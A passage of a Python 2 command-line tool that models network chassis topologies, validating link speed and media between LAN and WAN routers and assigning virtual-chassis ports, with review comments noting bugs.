                        for speed in modular_model[model]['speed']:
                            links[linkNum]['PosSpeed'].append(speed)
                        for media in modular_model[model]['intf_type']:
                            links[linkNum]['PosMedia'].append(media)
                    # Check if this is anything else, but a native interface
                    elif lan_router[hostname]['interfaces']['physical'][props['fpc']][props['pic']]['module_type'] != 'native':
                        # If this is a non-auxiliary port
                        model = lan_router[hostname]['interfaces']['physical'][props['fpc']][props['pic']]['module_mod']
                        #print "Expan Port: " + model + " (PIC)"
                        if modular_model.has_key(model):
                            for speed in modular_model[model]['speed']:
                                links[linkNum]['PosSpeed'].append(speed)
                            for media in modular_model[model]['intf_type']:
                                links[linkNum]['PosMedia'].append(media)
                        else:
                            for speed in system_model[model]['speed']:
                                links[linkNum]['PosSpeed'].append(speed)
                            for media in system_model[model]['intf_type']:
                                links[linkNum]['PosMedia'].append(media)
                    # Otherwise port is in a native module, get model from FPC
                    else:
                        model = lan_router[hostname]['interfaces']['physical'][props['fpc']]['fpc_mod']
                        #print "Native Port: " + model + " (FPC)"
                        for speed in system_model[model]['speed']:
                            links[linkNum]['PosSpeed'].append(speed)
                        for media in system_model[model]['intf_type']:
                            links[linkNum]['PosMedia'].append(media)
                    #print "***** PPRINT *****"
                    #pp.pprint(links)
                else:
                    print "Invalid link..."
                    intfsValid = False
        # If not a lan host...
        else:
            print "Host " + hostname + " is a WAN device."
            question = "Enter the " + hostname + " side interface to use"
            option = wan_router[hostname]['intf_name']
            selection = getOptionAnswer(question, option)
            # Candidate Interface Dictionary
            links.update({ linkNum : {} })
            links[linkNum].update({ 'Hostname' : hostname })
            links[linkNum].update({ 'PORT' : selection })
            intfsValid = True
    isMediaValid = False
    isSpeedValid = False
    print "Interfaces are both valid"
    print "Checking interfaces..."
    # Checks if host one is a wan_router...
    if links[one]['Hostname'] in wan_router:
        for speedOne in links[two]['PosSpeed']:
            speedOptions.append(speedOne)
        # Choose speed from lan_router options
        question = "Choose a speed"
        selection = getOptionAnswer(question, speedOptions)
        # Select the speed for this link
        if selection != "Go Back":
            print "Speed selected is: " + selection
            # Add the link.  linkNum is 2 here (the LAN side), so the
            # negotiated speed/media are stored on the LAN endpoint.
            links[linkNum].update({ 'ActSpeed' : selection })
            if len(links[two]['PosMedia']) > 1:
                if links[two]['ActSpeed'] == '10G':
                    links[linkNum].update({ 'ActMedia' : 'SFP+' })
                else:
                    links[linkNum].update({ 'ActMedia' : 'SFP' })
            addLinks(links)
    # Checks if host two is a wan_router...
    elif links[two]['Hostname'] in wan_router:
        for speedTwo in links[one]['PosSpeed']:
            speedOptions.append(speedTwo)
        # Choose speed from lan_router options
        question = "Choose a speed"
        selection = getOptionAnswer(question, speedOptions)
        # Select the speed for this link
        if selection != "Go Back":
            print "Speed selected is: " + selection
            # NOTE(review): linkNum is 2 here, i.e. the WAN endpoint, so
            # ActSpeed lands on the WAN side while the next line reads
            # links[one]['ActSpeed'] which was never set (KeyError), and
            # addLinks() later expects ActSpeed/ActMedia on the LAN side
            # (links[one]).  These updates should target links[one].
            # Add the link
            links[linkNum].update({ 'ActSpeed' : selection })
            if len(links[one]['PosMedia']) > 1:
                if links[one]['ActSpeed'] == '10G':
                    links[linkNum].update({ 'ActMedia' : 'SFP+' })
                else:
                    links[linkNum].update({ 'ActMedia' : 'SFP' })
            addLinks(links)
    # Otherwise they are both lan_routers...
    else:
        if links[one]['Hostname'] != links[two]['Hostname']:
            #print 'Hostnames are unique...'
            for mediaOne in links[one]['PosMedia']:
                #print "Media 1"
                for mediaTwo in links[two]['PosMedia']:
                    #print "Media 2"
                    # NOTE(review): this compares the whole PosMedia lists,
                    # not mediaOne == mediaTwo -- it is only True when both
                    # ends have identical media lists; probably intended to
                    # compare the individual media values being iterated.
                    if links[one]['PosMedia'] == links[two]['PosMedia']:
                        #print "Match! -> Link 1: " + mediaOne + " and Link 2: " + mediaTwo
                        isMediaValid = True
                        break
                    elif re.match(r'^SFP\+?$', mediaOne) and re.match(r'^SFP\+?$', mediaTwo):
                        #print "Match! -> Link 1: " + mediaOne + " and Link 2: " + mediaTwo
                        isMediaValid = True
                        break
                    elif re.match(r'^(SFP\+?|RJ45)$', mediaOne) and re.match(r'^(SFP\+?|RJ45)$', mediaTwo):
                        #print "Tenative Match! -> Link 1: " + mediaOne + " and Link 2: " + mediaTwo
                        print "Warning: One side of this link is RJ45 (copper) and the other is SFP. Make sure you have a RJ45 (copper) SFP."
                        isMediaValid = True
                    else:
                        #print "Link 1: " + mediaOne + " and Link 2: " + mediaTwo
                        pass
            if isMediaValid:
                # Collect every speed the two ends have in common
                for speedOne in links[one]['PosSpeed']:
                    #print "Speed 1"
                    for speedTwo in links[two]['PosSpeed']:
                        #print "Speed 2"
                        if speedOne == speedTwo:
                            print "Match! -> Link 1: " + speedOne + " and Link 2: " + speedTwo
                            speedOptions.append(speedOne)
                            isSpeedValid = True
                            break
                        else:
                            #print "Link 1: " + speedOne + " and Link 2: " + speedTwo
                            pass
                if isSpeedValid:
                    print "Link request valid!!!"
                    question = "Choose a speed"
                    selection = getOptionAnswer(question, speedOptions)
                    # Select the speed for this link
                    if selection != "Go Back":
                        print "Speed selected is: " + selection
                        # Add the link; media is only forced when a side has
                        # more than one possible medium (10G implies SFP+)
                        if len(links[one]['PosMedia']) > 1:
                            if selection == '10G':
                                links[one].update({ 'ActMedia' : 'SFP+' })
                            else:
                                links[one].update({ 'ActMedia' : 'SFP' })
                        links[one].update({ 'ActSpeed' : selection })
                        if len(links[two]['PosMedia']) > 1:
                            if selection == '10G':
                                links[two].update({ 'ActMedia' : 'SFP+' })
                            else:
                                links[two].update({ 'ActMedia' : 'SFP' })
                        links[two].update({ 'ActSpeed' : selection })
                        addLinks(links)
                else:
                    print "Speed is not compatible...try again"
                    print "Link request invalid!"
            else:
                print "Media is not compatible...try again"
                print "Link request invalid!"
        else:
            print "Links must be between different hosts"
            print "Link request invalid!"
# Create link and add ports
# links.update({ linkNum : {} })
# links[linkNum].update({ 'Hostname' : hostname })
# links[linkNum].update({ 'PosSpeed' : [] })
# links[linkNum].update({ 'PosMedia' : [] })
# links[linkNum].update({ 'ActSpeed' : speed })
# links[linkNum].update({ 'ActMedia' : media })
# links[linkNum].update({ 'FPC' : props['fpc'] })
# links[linkNum].update({ 'PIC' : props['pic'] })
# links[linkNum].update({ 'PORT' : props['port'] })
def addLinks(links):
    """Commit a validated two-endpoint link.

    links -- dict with keys 1 and 2, each endpoint carrying at least
    'Hostname' and 'PORT'; LAN endpoints additionally carry 'ActMedia',
    'ActSpeed', 'FPC' and 'PIC' (see the template comment above).

    Marks each LAN port as linked and records a new entry in the global
    link_map keyed by the next free integer id.
    """
    host = ""
    # Add attributes to ports
    for linkNum in links:
        # WAN endpoints have no port records to update; only LAN sides do
        if links[linkNum]['Hostname'] in lan_router:
            host = links[linkNum]['Hostname']
            # NOTE(review): media/speed deliberately leak out of this loop
            # and are reused below when building link_map -- this relies on
            # at least one endpoint being a LAN host, and on both LAN ends
            # sharing the same negotiated speed/media.
            media = links[linkNum]['ActMedia']
            speed = links[linkNum]['ActSpeed']
            fpc = links[linkNum]['FPC']
            pic = links[linkNum]['PIC']
            aport = links[linkNum]['PORT']
            # Set port attributes
            lan_router[host]['interfaces']['physical'][fpc][pic][aport].update({ 'is_linked' : True })
            lan_router[host]['interfaces']['physical'][fpc][pic][aport].update({ 'type' : media })
            lan_router[host]['interfaces']['physical'][fpc][pic][aport].update({ 'speed' : speed })
            #lan_router[host]['interfaces']['physical'][fpc][pic][aport].update({ 'access_mode' : 'VCP' })
    # Create link
    # link_map[]
    newKey = 1
    # Create link_id: next integer after the current highest key
    if link_map.has_key(newKey):
        newKey = max(link_map.keys()) + 1
        link_map.update({ newKey : {} })
    else:
        link_map.update({ newKey : {} })
    # Add attributes to new link.  Side A/B port strings are "fpc/pic/port"
    # for LAN endpoints and the raw interface name for WAN endpoints.
    if links[1]['Hostname'] in wan_router:
        # Side A
        link_map[newKey].update({ 'sideA_host' : links[1]['Hostname'] })
        intf = str(links[1]['PORT'])
        link_map[newKey].update({ 'sideA_port' : intf })
        # Side B
        link_map[newKey].update({ 'sideB_host' : links[2]['Hostname'] })
        intf = str(links[2]['FPC']) + '/' + str(links[2]['PIC']) + '/' + str(links[2]['PORT'])
        link_map[newKey].update({ 'sideB_port' : intf })
        link_map[newKey].update({ 'speed' : speed })
        link_map[newKey].update({ 'type' : media })
    elif links[2]['Hostname'] in wan_router:
        # Side A
        link_map[newKey].update({ 'sideA_host' : links[1]['Hostname'] })
        intf = str(links[1]['FPC']) + '/' + str(links[1]['PIC']) + '/' + str(links[1]['PORT'])
        link_map[newKey].update({ 'sideA_port' : intf })
        # Side B
        link_map[newKey].update({ 'sideB_host' : links[2]['Hostname'] })
        intf = str(links[2]['PORT'])
        link_map[newKey].update({ 'sideB_port' : intf })
        link_map[newKey].update({ 'speed' : speed })
        link_map[newKey].update({ 'type' : media })
    else:
        # Side A
        link_map[newKey].update({ 'sideA_host' : links[1]['Hostname'] })
        intf = str(links[1]['FPC']) + '/' + str(links[1]['PIC']) + '/' + str(links[1]['PORT'])
        link_map[newKey].update({ 'sideA_port' : intf })
        # Side B
        link_map[newKey].update({ 'sideB_host' : links[2]['Hostname'] })
        intf = str(links[2]['FPC']) + '/' + str(links[2]['PIC']) + '/' + str(links[2]['PORT'])
        link_map[newKey].update({ 'sideB_port' : intf })
        link_map[newKey].update({ 'speed' : speed })
        link_map[newKey].update({ 'type' : media })
    print "[Link Map]"
    pp.pprint(link_map)
    #print "Lan Router " + "(" + host + ")"
    #pp.pprint(lan_router[host])
# Creates dictionary of the passed chassis's modules
def moduleDict(hostname):
    """Return {fpc: {pic: [module models...]}} for every numeric PIC.

    Each PIC's list starts with its module_mod and additionally carries
    aux_mod when an auxiliary module (e.g. EX4300-UM-4XSFP) is present.
    """
    phys = lan_router[hostname]['interfaces']['physical']
    mods = {}
    for fpc, fpc_data in phys.items():
        mods[fpc] = {}
        # Loop over member components; numeric keys are PICs, string keys
        # (fpc_mod, vc_priority, ...) are attributes and are skipped.
        for pic, pic_data in fpc_data.items():
            if not isinstance(pic, (int, long)):
                continue
            # General modules (including VCP, Expansion, Builtin)
            mods[fpc][pic] = [pic_data['module_mod']]
            # Check for auxiliary modules (EX4300-UM-4XSFP)
            if 'aux_mod' in pic_data:
                mods[fpc][pic].append(pic_data['aux_mod'])
    return mods
# Assign VCPs Menu
def assignVCPsMenu():
    """Menu flow for assigning virtual-chassis ports on a selected stack."""
    hostname = selectChassisMenu("vc")
    if not hostname:
        return
    chassisStat = vcScan(hostname)
    question = "Select a chassis operation"
    if chassisStat in ("VCP", "QSFP"):
        # Dedicated VCP/QSFP+ ports exist: automatic wiring is possible
        choice = getOptionTRAnswer(question, [ "Automatic Add", "Manual Add", "Go Back" ])
        if choice == 0:
            assignVCPs(hostname, "auto", moduleDict(hostname))
        elif choice == 1:
            assignVCPs(hostname, "manual", moduleDict(hostname))
    elif chassisStat == "NONE":
        # No standard VCP-capable ports: only manual assignment offered
        choice = getOptionTRAnswer(question, [ "Manual Add", "Go Back" ])
        if choice == 0:
            assignVCPs(hostname, "manual", moduleDict(hostname))
# Assign VCPs - two options, automatic and manual. Automatic is for VC stacks with all QSFP+ or VCP links only
# Create link and add ports
# links.update({ linkNum : {} })
# links[linkNum].update({ 'Hostname' : hostname })
# links[linkNum].update({ 'PosSpeed' : [] })
# links[linkNum].update({ 'PosMedia' : [] })
# links[linkNum].update({ 'FPC' : props['fpc'] })
# links[linkNum].update({ 'PIC' : props['pic'] })
# links[linkNum].update({ 'PORT' : props['port'] })
def reserveVCPs(host, a_fpc, modDict):
    """Reserve one free VCP-capable port on member a_fpc of host.

    Scans the member's modules for a QSFP+/VCP-capable one, marks the
    first available port as 'VCP' in lan_router, and returns a link
    endpoint dict (Hostname/ActSpeed/ActMedia/FPC/PIC/PORT) describing
    it.  Returns an empty dict when no port could be reserved.
    """
    # intf_num is how many ports to reserve per call; the three cascaded
    # break statements below unwind the nested loops once it is reached.
    intf_num = 1
    inc = 0
    mylink = {}
    print "Neighor Member " + str(a_fpc)
    # Loop over PICs in neighbor FPC
    for a_pic in modDict[a_fpc].keys():
        for module in modDict[a_fpc][a_pic]:
            print "Checking module: " + module + "..."
            if module in modular_model.keys():
                print "Valid module!"
                type_list = modular_model[module]['intf_type']
                intf_speed = modular_model[module]['speed'][-1] # Use the last element in this list
                if ("QSFP+" in type_list) or ("VCP" in type_list):
                    intf_type = modular_model[module]['intf_type'][-1] # Use the last element in this list
                    print "Module VCP capable..."
                    # Numeric keys under the PIC are the actual port records
                    for a_port in lan_router[host]['interfaces']['physical'][a_fpc][a_pic]:
                        if(isinstance( a_port, ( int, long ) )):
                            print "Model: " + module + " FPC: " + str(a_fpc) + " PIC: " + str(a_pic) + " PORT: " + str(a_port)
                            intf = str(a_fpc) + "/" + str(a_pic) + "/" + str(a_port)
                            if isInterfaceAvailable(intf, host):
                                # Modify port parameters for this link
                                print "Interface found"
                                lan_router[host]['interfaces']['physical'][a_fpc][a_pic][a_port].update({ 'access_mode' : 'VCP' })
                                #lan_router[host]['interfaces']['physical'][a_fpc][a_pic][a_port].update({ 'type' : intf_type })
                                #lan_router[host]['interfaces']['physical'][a_fpc][a_pic][a_port].update({ 'speed' : intf_speed })
                                print "Inteface Speed: " + intf_speed
                                # Parameters for creating link
                                mylink.update({ 'Hostname' : host })
                                mylink.update({ 'ActSpeed' : intf_speed })
                                mylink.update({ 'ActMedia' : intf_type })
                                mylink.update({ 'FPC' : a_fpc })
                                mylink.update({ 'PIC' : a_pic })
                                mylink.update({ 'PORT' : a_port })
                                inc += 1
                            else:
                                print "Interface used"
                            if inc == intf_num:
                                print "Break 1"
                                break
                if inc == intf_num:
                    print "Break 2"
                    break
        if inc == intf_num:
            print "Break 3"
            break
    return mylink
def assignVCPs(host, mode, modDict):
    """Wire up virtual-chassis port links between the members of a stack.

    host    -- LAN host (virtual chassis) to cable
    mode    -- "auto" or "manual"; NOTE(review): currently unused, both
               menu paths end up doing the same automatic reservation
    modDict -- output of moduleDict(host)

    Uses link_mapping() to find each member's braided-cabling neighbors,
    reserves one VCP port on each end via reserveVCPs(), and records the
    link with addLinks().
    """
    # Number of FPCs or members in this stack
    links = {}
    stack_size = len(lan_router[host]['interfaces']['physical'])
    # Loop through modDict for each FPC in stack. This is the LOCAL member
    for fpc in modDict.keys():
        # Get the neighbors of this FPC, put them in a list, fpc_a and fpc_b
        mymap = link_mapping("braided", stack_size, fpc)
        # NOTE(review): a_fpc is immediately rebound by the for-loop below,
        # so these two assignments are dead; b_fpc is never used.
        a_fpc = mymap[0]
        b_fpc = mymap[1]
        # Loop over neighbor list
        for a_fpc in mymap:
            # Only the lower-numbered member of each pair creates the link,
            # so each member pair is cabled exactly once.
            if a_fpc > fpc:
                neigh_dict = reserveVCPs(host, a_fpc, modDict)
                local_dict = reserveVCPs(host, fpc, modDict)
                #print "Neigh Dict"
                #pp.pprint(neigh_dict)
                #print "Local Dict"
                #pp.pprint(local_dict)
                #print "Combined Dict"
                links.update({ 1 : {} })
                links.update({ 2 : {} })
                links[1].update(neigh_dict)
                links[2].update(local_dict)
                pp.pprint(links)
                addLinks(links)
            else:
                # Go to next neighbor
                pass
# VCP Links
# VCP Links
def vcScan(hostname):
    """Classify the virtual-chassis port capability of *hostname*.

    Returns "VCP", "QSFP" or "NONE" for use by assignVCPsMenu().

    NOTE(review): the printed messages and returned labels appear
    swapped -- "has QSFP+ for VCP" returns "VCP" and "has VCP" returns
    "QSFP".  assignVCPsMenu() treats both strings identically, so this
    currently only affects readability.
    """
    modDict = moduleDict(hostname)
    print "Hostname: " + hostname
    pp.pprint(modDict)
    # Chassis-level flags: True means "some FPC lacks this port type"
    noChassQSFP = False
    noChassVCP = False
    # Loop over FPCs modules and check for VCP capability
    for fpc in modDict.keys():
        noFpcQSFP = True
        noFpcVCP = True
        # Loop over PICs in FPC
        for pic in modDict[fpc].keys():
            for module in modDict[fpc][pic]:
                if module in modular_model.keys():
                    # VCP levels are... 1. DEFAULT (VCP or QSFP+), 2. 10G (optical SFP+), 3. NONE (no VCP capable ports)
                    intf_type = modular_model[module]['intf_type']
                else:
                    intf_type = system_model[module]['intf_type']
                # Determine the port types
                for mytype in intf_type:
                    if mytype == "QSFP+":
                        noFpcQSFP = False
                    elif mytype == "VCP":
                        noFpcVCP = False
        # NOTE(review): because of this elif, an FPC that lacks QSFP+ never
        # records that it also lacks VCP -- probably two independent ifs
        # were intended.
        if noFpcQSFP:
            noChassQSFP = True
        elif noFpcVCP:
            noChassVCP = True
        #print "FPC: " + str(fpc) + " PIC: " + str(pic) + " Module: " + module
    if noChassQSFP and noChassVCP:
        print "Virtual Chassis has no standard VCP ports!"
        myVCP = "NONE"
    elif not noChassQSFP:
        print "Virtual Chassis has QSFP+ for VCP"
        myVCP = "VCP"
    elif not noChassVCP:
        print "Virtual Chassis has VCP for VCP"
        myVCP = "QSFP"
    return myVCP
#stack_size = len(lan_router[hostname]['interfaces']['physical'])
#for fpc in modDict.keys():
# neigh_list = link_mapping("braided", stack_size, fpc)
# Function for determining which VC members a specific chassis will link with
def link_mapping(map_type, stack_size, member_num):
s1 = 0
s2 = 0
# Determine mappings for "long loop" type member
if map_type == 'longloop':
if stack_size == 2 and member_num == 1:
s1 = 0
s2 = 0
elif member_num == 0:
s1 = 1
s2 = stack_size - 1
elif member_num == (stack_size - 1):
s1 = 0
s2 = stack_size - 2
else:
s1 = member_num - 1
s2 = member_num + 1
# Determine mappings for "braided" type member
else:
if stack_size == 2 and member_num == 0:
s1 = 1
s2 = 1
elif stack_size == 2 and member_num == 1:
s1 = 0
s2 = 0
elif stack_size == 3 and member_num == 1:
s1 = 0
s2 = 2
elif stack_size == 4 and member_num == 2:
s1 = 0
s2 = 3
elif member_num == 0:
s1 = 1
s2 = 2
elif member_num == 1:
s1 = 0
s2 = 3
elif member_num == (stack_size - 1):
s1 = member_num - 2
s2 = member_num - 1
elif member_num == (stack_size - 2):
s1 = member_num - 2
s2 = member_num + 1
else:
s1 = member_num - 2
s2 = member_num + 2
s_list = []
s_list.append(s1)
s_list.append(s2)
print "( " + str(s1) + ", " + str(s2) + " )"
return s_list
###############################
# ========== MENUS ========== #
###############################
# Primary Menu
def mainMenu():
    """Top-level menu loop: dispatch to build/link/show/modify/save/load
    until the user chooses Exit."""
    global lan_router
    global wan_router
    fn = "mydict.csv"
    question = "Select an operation"
    option = [ "Build Chassis", "Define Inter-Connects", "Show Devices", "Modify Chassis", "Save Topology", "Load Topology", "Exit" ]
    while True:
        choice = getOptionTRAnswer(question, option)
        if choice == 0:
            buildChassisMenu()
        elif choice == 1:
            linkMenu()
        elif choice == 2:
            showDeviceMenu()
        elif choice == 3:
            modChassisMenu()
        elif choice == 4:
            # Persist both topology dictionaries to disk
            saveDict(lan_router, 'lan_router')
            saveDict(wan_router, 'wan_router')
        elif choice == 5:
            # Replace the in-memory topology with the saved copies
            lan_router.clear()
            wan_router.clear()
            lan_router = openDict('lan_router')
            wan_router = openDict('wan_router')
        else:
            break
# Build chassis Menu
def buildChassisMenu():
    """Chassis-construction submenu: add WAN/LAN devices or list them."""
    prompt = "Select a chassis operation"
    choices = [ "Add WAN Device", "Add LAN Device", "Show Devices", "Go Back" ]
    handlers = { 0 : addWANDevice, 1 : addDeviceMenu, 2 : showDeviceMenu }
    while True:
        picked = getOptionTRAnswer(prompt, choices)
        if picked not in handlers:
            break
        handlers[picked]()
# Link Menu
def linkMenu():
    """Link-management submenu: create links, show interfaces, assign VCPs."""
    prompt = "Select a link operation"
    choices = [ "Create Links", "Display Interfaces", "Assign VCPs", "Go Back" ]
    handlers = { 0 : createLink, 1 : displayIntfMenu, 2 : assignVCPsMenu }
    while True:
        picked = getOptionTRAnswer(prompt, choices)
        if picked not in handlers:
            break
        handlers[picked]()
# Link Menu - Select Devices - options ('lan', 'wan', 'both') default to 'lan'
# This function gets the current hostnames, ask for user to select one, and returns that hostname.
def selectDevices(devices='lan'):
# Create option list
option = []
# Add hostnames to list depending on argument
if devices == 'lan' or devices == 'both':
for hostname in lan_router.keys():
option.append(hostname)
if devices == 'wan' or devices == 'both':
for hostname in wan_router.keys():
option.append(hostname)
option.append("Go Back")
# Ask user to select 2 devices
question = "Choose a system"
selection = getMultiAnswer(question, option, 2)
for host in selection:
print "Host -> " + host
return selection
# Display Interfaces Menu
def displayIntfMenu():
    """Ask for a chassis and show its interfaces; any error (e.g. the user
    backing out of the chassis menu) is silently ignored."""
    try:
        hostname = selectChassisMenu()
        displayInterfaces(hostname)
    except Exception:
        pass
# Menu for displaying chassis
def showDeviceMenu():
    """Show the basic chassis table, then a detailed per-slot view of the
    chassis the user selects (VC members, single chassis, modular FPCs,
    or WAN links)."""
    # Display a basic display of chassis
    displayChassisBasic()
    print "Choose a switch for more detail:"
    hostname = selectChassisMenu()
    if hostname:
        # Display Detailed Chassis View
        print "\n" + "=" * 95
        print "Hostname:\t" + hostname
        # For Single Chassis or Virtual Chassis
        if hostname in lan_router.keys():
            print "System Type:\t" + lan_router[hostname]['system_type']
            if lan_router[hostname]['chassis_type'] == 'stackable':
                # Virtual Chassis
                if lan_router[hostname]['is_vc']:
                    print "Model:\t\tVirtual Chassis"
                    for fpc in lan_router[hostname]['interfaces']['physical'].keys():
                        print "-" * 95
                        print "VC " + str(fpc) + ":\t" + lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod'] + "\t" + \
                            str(lan_router[hostname]['interfaces']['physical'][fpc]['vc_priority'])
                        for pic in lan_router[hostname]['interfaces']['physical'][fpc].keys():
                            #pp.pprint(lan_router[hostname])
                            # General modules (inclduing VCP, Expansion, Builtin)
                            if(isinstance( pic, ( int, long ) )):
                                module_mod = lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
                                # If it's a module
                                if module_mod in modular_model.keys():
                                    if 'VCP' in modular_model[module_mod]['intf_type']:
                                        print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] + "):\t" + \
                                            lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod'] + " (VCP)"
                                    else:
                                        print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] + "):\t" + \
                                            lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
                                # If it's native
                                else:
                                    print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] + "):\t" + \
                                        lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
                                # Check for auxillary modules (EX4300-UM-4XSFPP)
                                if lan_router[hostname]['interfaces']['physical'][fpc][pic].has_key('aux_mod'):
                                    print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['aux_type'] + "):\t" + \
                                        lan_router[hostname]['interfaces']['physical'][fpc][pic]['aux_mod']
                        print "-" * 95
                    print "=" * 95
                # Single Chassis
                else:
                    fpc = 0
                    print "Model:\t\t" + lan_router[hostname]['chassis_mod']
                    print "-" * 95
                    print "FPC " + str(fpc) + ":\t" + lan_router[hostname]['chassis_mod']
                    for pic in lan_router[hostname]['interfaces']['physical'][fpc].keys():
                        #pp.pprint(lan_router[hostname])
                        # General modules (inclduing VCP, Expansion, Builtin)
                        if(isinstance( pic, ( int, long ) )):
                            module_mod = lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
                            # If it's a module
                            if module_mod in modular_model.keys():
                                if 'VCP' in modular_model[module_mod]['intf_type']:
                                    print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] + "):\t" + \
                                        lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod'] + " (vcp)"
                                else:
                                    print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] + "):\t" + \
                                        lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
                            # If it's native
                            else:
                                print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] + "):\t" + \
                                    lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
                            # Check for auxillary modules (EX4300-UM-4XSFPP)
                            if lan_router[hostname]['interfaces']['physical'][fpc][pic].has_key('aux_mod'):
                                print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['aux_type'] + "):\t" + \
                                    lan_router[hostname]['interfaces']['physical'][fpc][pic]['aux_mod']
                    print "=" * 95
            # For Modular Chassis
            else:
                print "Model:\t\t" + lan_router[hostname]['chassis_mod']
                for fpc in sorted(lan_router[hostname]['interfaces']['physical'].keys()):
                    print "-" * 95
                    print "FPC " + str(fpc) + ":\t" + lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
                    print "-" * 95
                print "=" * 95
            # Display Chassis Visualization
            displayChassisHardware(hostname, "Both")
        # Should only match WAN system
        else:
            print "System Type:\twan"
            print "Model:"
            for wanlink in wan_router[hostname]['intf_name']:
                print "Link:\t" + wanlink
# Create a WAN device
def addWANDevice():
    """Interactively create a WAN router: hostname, a list of interface
    names (type 'q' to finish), and a preferred-egress flag."""
    wan_hostname = getInputAnswer("Enter a hostname")
    wan_router.update({ wan_hostname : {} })
    wan_intf = []
    # Collect interface names until the user types 'q'
    while True:
        intf = getInputAnswer("Enter " + wan_hostname + " interface name")
        if intf == "q":
            break
        wan_intf.append(intf)
    wan_router[wan_hostname].update({ 'intf_name' : wan_intf })
    is_preferred = getYNAnswer("Is " + wan_hostname + " the preferred egress")
    wan_router[wan_hostname].update({ 'pref_egress' : is_preferred == "y" })
    pp.pprint(wan_router)
# Delete system menu
def deleteChassisMenu():
    """List the LAN chassis and delete whichever one the user picks
    (no-op if they choose "Go Back")."""
    option = sorted(lan_router.keys())
    option.append("Go Back")
    picked = getOptionAnswer("Select chassis to delete", option)
    # Delete the entire system unless the user backed out
    if picked != "Go Back":
        del lan_router[picked]
# Create a MDF/IDF device
def addDeviceMenu():
    """LAN device submenu: create single or virtual chassis, delete one,
    or list the inventory."""
    prompt = "Select a system type to create"
    choices = [ "Single Chassis", "Virtual Chassis", "Delete Chassis", "Show Devices", "Go Back" ]
    while True:
        picked = getOptionTRAnswer(prompt, choices)
        if picked == 0:
            # Single chassis: run the common setup first, then build it
            addSystemSingleChassis(setSystemCommon())
        elif picked == 1:
            createVC()
        elif picked == 2:
            deleteChassisMenu()
        elif picked == 3:
            showDeviceMenu()
        else:
            break
# Modify Menu
def modChassisMenu():
    """Modify an existing chassis: rename it and add/remove FPCs, VC
    members, or expansion modules depending on its type."""
    displayChassisBasic()
    hostname = selectChassisMenu()
    question = "Please choose an action"
    if hostname is not None:
        # Modular chassis: manage FPCs
        if lan_router[hostname]['chassis_type'] == 'modular':
            while True:
                option = [ "Change Hostname", "Add FPCs", "Delete FPCs", "Show Devices", "Go Back" ]
                print "Device: " + hostname
                selection = getOptionTRAnswer(question, option)
                if selection == 0:
                    # NOTE(review): the other branches rename *hostname*; this
                    # one re-prompts for a chassis to rename -- confirm intended.
                    setSystemHostname(selectChassisMenu('single'))
                elif selection == 1:
                    addFPC(hostname)
                elif selection == 2:
                    delFPC(hostname)
                elif selection == 3:
                    showDeviceMenu()
                else:break
        # Virtual chassis: manage members
        elif lan_router[hostname]['is_vc']:
            while True:
                option = [ "Change Hostname", "Add Member", "Delete Member", "Show Devices", "Go Back" ]
                print "Device: " + hostname
                selection = getOptionTRAnswer(question, option)
                if selection == 0:
                    setSystemHostname(hostname)
                elif selection == 1:
                    addSystemVirtualChassis(hostname, nextMember(hostname))
                elif selection == 2:
                    delSystemChassisMenu(hostname)
                elif selection == 3:
                    showDeviceMenu()
                else:break
        # Standalone stackable: manage expansion modules
        else:
            while True:
                option = [ "Change Hostname", "Add Modules", "Delete Modules", "Show Devices", "Go Back" ]
                print "Device: " + hostname
                selection = getOptionTRAnswer(question, option)
                if selection == 0:
                    setSystemHostname(hostname)
                elif selection == 1:
                    addModules(hostname, 'expan', 0)
                elif selection == 2:
                    delModules(hostname)
                elif selection == 3:
                    showDeviceMenu()
                else:break
# Asks user to select a chassis and return the name vc/single/all
def selectChassisMenu(chassis_type="all"):
    """Prompt the user to pick a chassis and return its hostname.

    chassis_type -- 'vc' offers only virtual chassis, 'single' offers
    standalone stackables plus modular chassis, anything else offers all
    LAN systems.  WAN routers are always offered.  Returns False when the
    user picks "Go Back".
    """
    option = list(sorted(wan_router.keys()))
    for hostname in sorted(lan_router.keys()):
        entry = lan_router[hostname]
        if chassis_type == "vc":
            # Virtual chassis only
            if entry['chassis_type'] == 'stackable' and entry['is_vc']:
                option.append(hostname)
        elif chassis_type == "single":
            # Standalone stackables and modular chassis
            standalone_stack = entry['chassis_type'] == 'stackable' and not entry['is_vc']
            if standalone_stack or entry['chassis_type'] == 'modular':
                option.append(hostname)
        else:
            option.append(hostname)
    option.append("Go Back")
    picked = getOptionAnswer("Select chassis", option)
    # False signals "user backed out" to callers
    if picked == "Go Back":
        return False
    return picked
##################################################
# ========== SINGLE CHASSIS FUNCTIONS ========== #
##################################################
# Creates a single chassis system
def addSystemSingleChassis(hostname, fpc=0):
if hostname is not None:
# Set Router Model
model = getOptionAnswer("Select the router model", system_model.keys())
# If this is a modular system
if system_model[model]['chassis_type'] == "modular":
# Set Dictionary Format for chassis
lan_router[hostname].update({ 'chassis_type' : 'modular' })
lan_router[hostname].update({ 'is_vc' : False })
lan_router[hostname].update({ 'chassis_mod' : model })
lan_router[hostname].update({ 'interfaces' : {} })
lan_router[hostname]['interfaces'].update({ 'physical' : {} })
# Add first FPC, must have at least one RE
